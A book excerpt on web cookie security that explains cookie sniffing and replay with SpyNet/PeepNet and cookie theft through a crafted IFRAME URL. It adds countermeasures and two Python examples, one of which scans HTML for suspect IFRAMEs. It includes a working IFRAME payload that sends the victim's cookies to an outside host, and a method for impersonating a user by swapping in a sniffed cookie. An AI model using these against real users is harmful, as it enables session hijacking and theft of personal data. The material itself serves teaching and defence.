Beware the Cookie Monster

Part of the document "Network Security Secrets and Solutions", Scambray, McClure, part 9 ppt (pages 64 - 67)

Ever wonder how some web sites personalize your visits, like remembering the contents of a shopping cart or maybe a preferred shipping method automatically filled into a form? The protocol that underlies the World Wide Web, HTTP, does not have a facility for tracking things from one visit to another, so an extension was rigged up to allow it to maintain such “state” across HTTP requests and responses. The mechanism, described in RFC 2109, sets cookies, or special tokens contained within HTTP requests and responses that allow web sites to remember who you are from visit to visit. Cookies can be set per session, in which case they remain in volatile memory and expire when the browser is closed, or according to a set expiration time. Or they can be persistent, residing as a text file on the user’s hard drive, usually in a folder called “Cookies” (this is typically %windir%\Cookies under Win9x, or %userprofile%\Cookies under NT/2000). As you might imagine, attackers who can lay their hands on your cookies might be able to spoof your online identity or glean sensitive information cached within cookies. Read on to see how easy it can be.
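As an added example (not from the book), here is how the distinction drawn above shows up in the Set-Cookie headers themselves: a small Python parser that classifies each cookie as per-session or persistent from its Max-Age or Expires attribute, and parses the Cookie header the browser sends back. The Set-Cookie responses and the capture time are constructed for illustration.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed: the moment the capture is assumed to have been taken, so that
# "is this cookie still valid?" does not depend on the wall clock.
CAPTURE_TIME = datetime(2001, 1, 1, tzinfo=timezone.utc)

def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs

def classify_cookie(header, now=None):
    """Return 'session', 'persistent' or 'expired' for one Set-Cookie header.

    RFC 2109 carries the lifetime in Max-Age (seconds); the older Netscape form
    uses an Expires date. A cookie with neither lives only in browser memory;
    the others are written to disk (e.g. %windir%\\Cookies), where they can be read.
    """
    now = now or datetime.now(timezone.utc)
    _, _, attrs = parse_set_cookie(header)
    if "max-age" in attrs:
        return "persistent" if int(attrs["max-age"]) > 0 else "expired"
    if "expires" in attrs:
        when = parsedate_to_datetime(attrs["expires"])
        if when.tzinfo is None:          # a "-0000" zone parses as naive
            when = when.replace(tzinfo=timezone.utc)
        return "persistent" if when > now else "expired"
    return "session"

def parse_cookie_header(header):
    """Parse the Cookie header a browser sends back, e.g. the PeepNet capture."""
    cookies = {}
    for item in header.split(";"):
        key, _, val = item.partition("=")
        if key.strip():
            cookies[key.strip()] = val.strip()
    return cookies

# Constructed Set-Cookie responses in the shape victim.net would have sent.
SAMPLE_SET_COOKIES = [
    "jrunsessionid=96114024278141622; Path=/",
    "cuid=T0RPMlZXTFRLR1pWTVFISEblahblah; Expires=Wed, 09 Jun 2021 10:18:14 GMT; Path=/",
]
```

Running `classify_cookie` over the two constructed headers labels the session identifier as a session cookie and the cuid as persistent, which is exactly the property the attack later in this section depends on.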

Cookie Snarfing

Popularity: 7
Simplicity: 5
Impact: 2
Risk Rating: 5

The brute force way to hijack cookies is to sniff them off the network and then replay them to the server. Any ol’ packet capture tool can perform this duty, but one of the better ones for cookie snarfing is SpyNet/PeepNet by Laurentiu Nicula (search the archives at http://packetstorm.securify.com to find this gem). SpyNet is two tools that act in concert: the CaptureNet program performs the actual packet capture and saves them to disk, and the PeepNet tool opens the capture file to reconstruct the sessions in human-legible form. PeepNet can actually replay a web-browsing session just as if you were the user being monitored. The following example is a snippet from a PeepNet reconstruction of a session that uses cookie authentication to control access to personalized page views (names have been changed to protect the innocent):

GET http://www.victim.net/images/logo.gif HTTP/1.0
Accept: */*
Referrer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; cuid=T0RPMlZXTFRLR1pWTVFISEblahblah

You can plainly see the cookie token supplied in this HTTP request sent to the server. The relevant portion is “cuid=”, which denotes a unique identifier used to authenticate this user of the site www.victim.net. Let’s say the attackers now visit victim.net, create their own login ID, and receive their own cookie. It just so happens that victim.net sets persistent cookies that are written to files on disk (as opposed to per-session cookies stored in volatile memory). Attackers can open their own cookie and replace the “cuid=” entry with the one they sniffed. Upon logging back in to victim.net, the attackers are now masquerading as the original customer.

PeepNet’s ability to replay an entire session or to select portions of it makes this type of attack much easier. By use of the Go Get It! button, the actual pages viewed by a user can be retrieved, using the same cookie snarfed earlier by CaptureNet. Figure 16-4 illustrates PeepNet displaying someone’s completed orders using their authentication cookie sniffed by CaptureNet (see the lower-right frame following the “Cookie:” notation—these are the session and authentication cookies, respectively).

This is a pretty nifty trick. CaptureNet can also present a full decode of recorded traffic that’s nearly equivalent to the output of professional-level protocol analysis tools like Network Associates, Inc.’s SnifferPro. Even better, SpyNet is free!

Countermeasures: Cookie Cutters

Be wary of sites that use cookies for authentication and storage of sensitive personal data.

One tool to help in this regard is Cookie Pal from Kookaburra Software at http://www.kburra.com/cpal.html. It can be set to warn you when web sites attempt to set cookies, enabling you to see what’s going on behind the scenes so you can decide whether you want to allow such activity. Microsoft’s Internet Explorer has a built-in cookie screening feature, available under the Internet Options control panel, Security tab, Internet Zone, Custom Level, “Prompt” for persistent and per-session cookies. Netscape browser cookie behavior is set via Edit | Preferences | Advanced, and checking either Warn Me Before Accepting A Cookie or Disable Cookies (see Figure 16-3). For those cookies that you do accept, check them out if they are written to disk, and see if the site is storing any personal information about you.

Also remember, if you visit a site that uses cookies for authentication, they should at least use SSL to encrypt the initial post of your username and password so that it doesn’t just show up as plaintext in PeepNet.

We’d prefer to disable cookies outright, but many of the sites we frequent often require them to be enabled. For example, Microsoft’s wildly popular Hotmail service requires cookies to be enabled in order to log in, and because Hotmail rotates between various authentication servers, it isn’t easy just to add Hotmail to the Trusted Sites zone under Internet Options (as we describe in the preceding section on security zones). You could use the *.hotmail.com notation to help out here. Cookies are an imperfect solution to inadequacies in HTTP, but the alternatives are probably much worse (for example, appending an identifier to URLs that may be stored on proxies). Until someone comes up with a better idea, monitoring cookies using the tools referenced earlier is the only solution.

Figure 16-4. A cookie recorded by CaptureNet and played back in PeepNet

Cookie Stealing via Malicious URL

Popularity: 5
Simplicity: 8
Impact: 2
Risk Rating: 5

Here’s a scary thought: IE users clicking a purposely crafted URL are potentially vulnerable to having their cookies revealed. Bennett Haselton and Jamie McCarthy of Peacefire have posted a script at http://www.peacefire.org/security/iecookies that makes this thought a reality: it extracts cookies from the client machine simply by clicking a link within this page. The contents of cookies residing on the user’s machine are readable by this script and thus are accessible to web site operators.

This can also be used to nasty effect when sent within inline frame (IFRAME) tags embedded in HTML on a web page (or in HTML-formatted email messages or newsgroup posts). The following example suggested by Internet security consultant Richard M. Smith points out how IFRAME could be used in conjunction with the Peacefire exploit to steal cookies:

<iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3f.yahoo.com/"></iframe>

A malicious email message that included many such embedded links could grab cookies on the user’s hard drive and return them to the peacefire.org site operators. Fortunately, the Peacefire gang seem like nice folk; but do you really want them to have all that potentially revealing data?
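Added example, not from the book or from Peacefire: from the defender’s side, a URL like the one above stands out because the text before the first real slash contains percent-encoded slashes and a question mark, so the domain it appears to belong to (.yahoo.com) and the host the request actually reaches (www.peacefire.org) differ. The Python scanner below applies that check to every IFRAME in an HTML fragment such as a mail body; the sample HTML is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Percent-encodings that, once decoded, move the end of the host name.
ENCODED_DELIMITERS = ("%2f", "%3f", "%23")   # "/", "?", "#"

def authority(url):
    """Return the host part as written: between 'scheme://' and the first literal '/'."""
    _, sep, rest = url.partition("://")
    return rest.split("/", 1)[0] if sep else ""

def analyse_src(url):
    """Return None for a clean URL, else a finding describing the host confusion."""
    host_as_written = authority(url)
    found = [d for d in ENCODED_DELIMITERS if d in host_as_written.lower()]
    if not found:
        return None
    # The host a server (or a browser that decodes first) actually connects to.
    real_host = unquote(host_as_written)
    for delimiter in "/?#":
        real_host = real_host.split(delimiter, 1)[0]
    return {"src": url, "host_as_written": host_as_written,
            "real_host": real_host, "encoded_delimiters": found}

class IframeScanner(HTMLParser):
    """Collects findings for every <iframe src=...> in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                finding = analyse_src(value)
                if finding:
                    self.findings.append(finding)

def scan_html(fragment):
    """Scan a web page or HTML-formatted mail body for suspect IFRAME sources."""
    scanner = IframeScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

# Constructed sample: the IFRAME from the text beside a harmless one whose
# encoded slash sits in the query string, where it is legitimate.
SAMPLE_HTML = (
    '<iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f'
    'showcookie.html%3f.yahoo.com/"></iframe>'
    '<iframe src="http://www.example.com/page.html?x=%2f"></iframe>'
)
```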

Closing the Open Cookie Jar

Obtain and apply the patch referenced at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. Alternatively, cookies can be monitored using Cookie Pal or IE’s built-in functionality as described earlier.
